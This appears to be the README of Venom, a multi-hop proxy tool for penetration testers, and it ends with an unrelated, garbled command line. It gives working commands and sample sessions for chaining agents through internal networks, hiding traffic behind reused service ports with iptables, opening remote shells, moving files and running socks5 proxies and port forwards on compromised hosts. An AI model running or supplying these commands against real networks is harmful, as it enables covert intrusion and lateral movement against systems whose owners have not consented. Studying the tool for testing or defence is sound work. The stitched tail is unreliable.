Venom is a multi-hop proxy tool developed for penetration testers using Go.
You can use venom to easily proxy network traffic to a multi-layer intranet, and easily manage intranet nodes.

This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author does not assume any legal and related responsibilities!
Since the IoT device (arm/mips/... architecture) usually has limited resources, in order to reduce the size of the binary file, the binaries for the IoT environment do not support port reuse and ssh tunnel, and in order to reduce memory usage, the binaries only support less network concurrency and smaller buffers.
You can directly download the executable files from https://github.com/Dliv3/Venom/releases
If you want to compile the project from source, you need to install go >= 1.11, then execute the following commands.
go get -u github.com/Dliv3/Venom/...
# $GOPATH is the environment variable configured when Go is installed. It can be viewed by the 'go env' command.
cd $GOPATH/src/github.com/Dliv3/Venom
# Compiled binary files are stored in the release folder in the current directory.
./build.sh
Venom demo videos: https://www.youtube.com/playlist?list=PLtZO9vwOND91vZ7yCmlAvISmEl2iQKjdI
Admin listens on the port 9999, the agent connects to the admin:
./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999
Agent listens on the port 8888, the admin connects to the agent:
./agent_linux_x64 -lport 8888
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
Agent provides two port reuse methods
The ports of most services can be reused on linux.
The ports of services such as apache and mysql can be reused on Windows, and the ports of RDP, IIS, etc. can not be reused temporarily.
The reused port can still provide its original service normally.
The first port reuse method
# Apache under windows environment:
# Reuse apache 80 port, does not affect apache to provide normal http service
# The value of -h is the local ip, and can't be 0.0.0.0. Otherwise, port reuse cannot be performed.
./agent.exe -lhost 192.168.204.139 -reuse-port 80
./admin_macos_x64 -rhost 192.168.204.139 -rport 80
The second port reuse method
# Apache under linux environment:
# Requires root privileges
sudo ./agent_linux_x64 -lport 8080 -reuse-port 80
This method will add the iptables rules, iptables forwards the traffic of the reuse-port to the lport, and then distribute the traffic by the agent.
One thing to note is that if the sigtermor sigint ends the agent (kill or ctrl-c), the agent will automatically clean up the iptables rules. If the agent is killed by kill -9, the iptables rule cannot be automatically cleaned up and needs to be cleaned manually because the agent program cannot deal with the sigkill signal.
In order to prevent the iptables rules from being automatically cleaned up and the penetration tester cannot access the 80-port service, the second port reuse method uses iptables -m recent to control whether the iptables forwarding rules are enabled through special tcp packets.
Reference https://threathunter.org/topic/594545184ea5b2f5516e2033
```
# Start the iptables port reuse rules set by the agent on the linux host # If rhost is on the intranet, you can use the socks5 to proxy traffic. See the following for the use of the socks5 proxy. python scripts/port_reuse.py --start --rhost 192.168.204.135 --rport 80
# Connect to the agent ./admin_macos_x64 -rhost 192.168.204.135 -rport 80
# If you want to turn off iptables port reuse rules python scripts/port_reuse.py --stop --rhost 192.168.204.135 --rport 80 ``` - network traffic encryption
Users can specify a password with the -passwd option, which is used to generate the key required for AES encryption.
``` # Specify the password as dlive@dubhe with -passwd ./admin_macos_x64 -lport 8889 -passwd dlive@dubhe
# The agent specifies the same password to connect with the admin node ./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe ```
``` (admin node) >>> help
help Help information.
exit Exit.
show Display network topology.
getdes View description of the target node.
setdes [info] Add a description to the target node.
goto [id] Select id as the target node.
listen [lport] Listen on a port on the target node.
connect [rhost] [rport] Connect to a new node through the target node.
sshconnect [user@ip:port] [dport] Connect to a new node through ssh tunnel.
shell Start an interactive shell on the target node.
upload [local_file] [remote_file] Upload files to the target node.
download [remote_file] [local_file] Download files from the target node.
socks [lport] Start a socks5 server.
lforward [lhost] [sport] [dport] Forward a local sport to a remote dport.
rforward [rhost] [sport] [dport] Forward a remote sport to a local dport.
```
The letter 'A' represents the admin node, and the number represents the agent node.
The following topology diagram shows that node1 connects to the admin node, node2 and node4 connect to 1 node, and node3 connects to node2.
(node 1) >>> show
A
+ -- 1
+ -- 2
+ -- 3
+ -- 4
Note that to operate on a newly joined node, first run the show command on the admin node to synchronize the network topology and node number.
(admin node) >>> goto 1
(node 1) >>>
After going to a node, you can use the commands that will be described below.
(node 1) >>> setdes linux x64 blahblahblah
(node 1) >>> getdes
linux x64 blahblahblah
Node1 connects to port 9999 of 192.168.0.103.
(node 1) >>> connect 192.168.0.103 9999
connect to 192.168.0.103 9999
successfully connect to the remote port!
(node 1) >>> show
A
+ -- 1
+ -- 2
Listening to port 9997 on the node1.
Then run ./agent_linux_x64 -rhost 192.168.204.139 -rport 9997 on another machine to connect to node1.
(node 1) >>> listen 9997
listen 9997
the port 9997 is successfully listening on the remote node!
(node 1) >>> show
A
+ -- 1
+ -- 2
+ -- 3
Execute ./agent_linux_x64 -lport 9999 on 192.168.0.104, then node3 connects to port 9998 of 192.168.0.104 through the ssh tunnel using sshconnect command.
You can use ssh or private key for ssh authentication.
(node 1) >>> goto 3
(node 3) >>> sshconnect root@192.168.0.104:22 9999
use password (1) / ssh key (2)? 2
file path of ssh key: /Users/dlive/.ssh/id_rsa
connect to target host's 9999 through ssh tunnel (root@192.168.0.104:22).
ssh successfully connects to the remote node!
(node 3) >>> show
A
+ -- 1
+ -- 2
+ -- 3
+ -- 4
(node 1) >>> shell
You can execute commands in this shell :D, 'exit' to exit.
bash: no job control in this shell
bash-3.2$ whoami
whoami
dlive
bash-3.2$ exit
exit
exit
Upload local /tmp/test.pdf to node1's /tmp/test2.pdf
(node 1) >>> upload /tmp/test.pdf /tmp/test2.pdf
upload /tmp/test.pdf to node 1: /tmp/test2.pdf
this file is too large(>100M), do you still want to upload it? (y/n)y
154.23 MiB / 154.23 MiB [========================================] 100.00% 1s
upload file successfully!
Download node1's file /tmp/test2.pdf to your local /tmp/test3.pdf
(node 1) >>> download /tmp/test2.pdf /tmp/test3.pdf
download /tmp/test2.pdf from node 1: /tmp/test3.pdf
this file is too large(>100M), do you still want to download it? (y/n)y
154.23 MiB / 154.23 MiB [========================================] 100.00% 1s
download file successfully!
(node 1) >>> socks 7777
a socks5 proxy of the target node has started up on local port 7777
After executing the socks command, a port will be opened locally on the admin node, such as 7777 above, using 7777 to perform the socks5 proxy.
Lforward forwards the local 8888 port of the admin node to the 8888 port of node1.
(node 1) >>> lforward 127.0.0.1 8888 8888
forward local network 127.0.0.1 port 8888 to remote port 8888
Rforward forwards the 192.168.204.103 port 8889 of the node1 network to the local 8889 port of the admin node.
(node 1) >>> rforward 192.168.204.103 8889 8889
forward remote network 192.168.204.103 port 8889 to local port 8889
script/port_reuse.py to enable the port reuse rules set by the agent on the target host.$ claude mcp add Venom \
-- python -m otcore.mcp_server <graph>